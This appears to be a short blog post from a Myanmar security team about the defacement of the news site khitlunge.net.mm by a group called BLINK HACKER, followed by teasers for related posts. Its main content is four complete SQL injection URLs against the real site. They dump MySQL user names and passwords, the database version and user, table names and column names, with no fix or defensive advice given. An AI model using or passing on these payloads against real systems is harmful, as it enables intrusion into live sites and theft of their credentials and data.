A hacker group named themselves BLINK HACKER hacked http://www.khitlunge.net.mm and it’s a social and news site for Myanmar Latest News, Myanmar Breaking News, Myanmar Update News.

I don’t know how they attack and defaced but one of my team member reported and mailed me yesterday before Blink Hacker defaced it.

SQL Injection of Khitlunge.net.mm is as follow..

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28user,0x3a,password%29,4,5,6%20from%20mysql.user--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.khitlunge.net.mm/active_banner_r.php?id=-1%20union%20all%20select%201,2,group_concat%28column_name%29,4,5,6%20from%20information_schema.columns%20where%20table_schema=database%28%29--

Explore More

Critical SQL Injection in Myanmar Calendar

PlanetCreator‘s Security Team Researcher Infofreakzzz reported another Critical SQL injection (vulnerability) on Myanmar Calendar URL : http://www.myanmarcalendar.org/ SQL injection is a code injection technique that exploits a security vulnerability occurring

Read More

How to install APF (Advanced Policy Firewall) and DDOS Deflate

What is APF (Advanced Policy Firewall)? APF Firewall APF is a policy based iptables firewall system designed for ease of use and configuration. It employs a subset of features to

Read More

Friendster accounts hacking menace

Someone asked us recently how to hack a Friendster account. Of course, we refused point blank as hacking is not only illegal, it is utterly loathsome. It is none of

Read More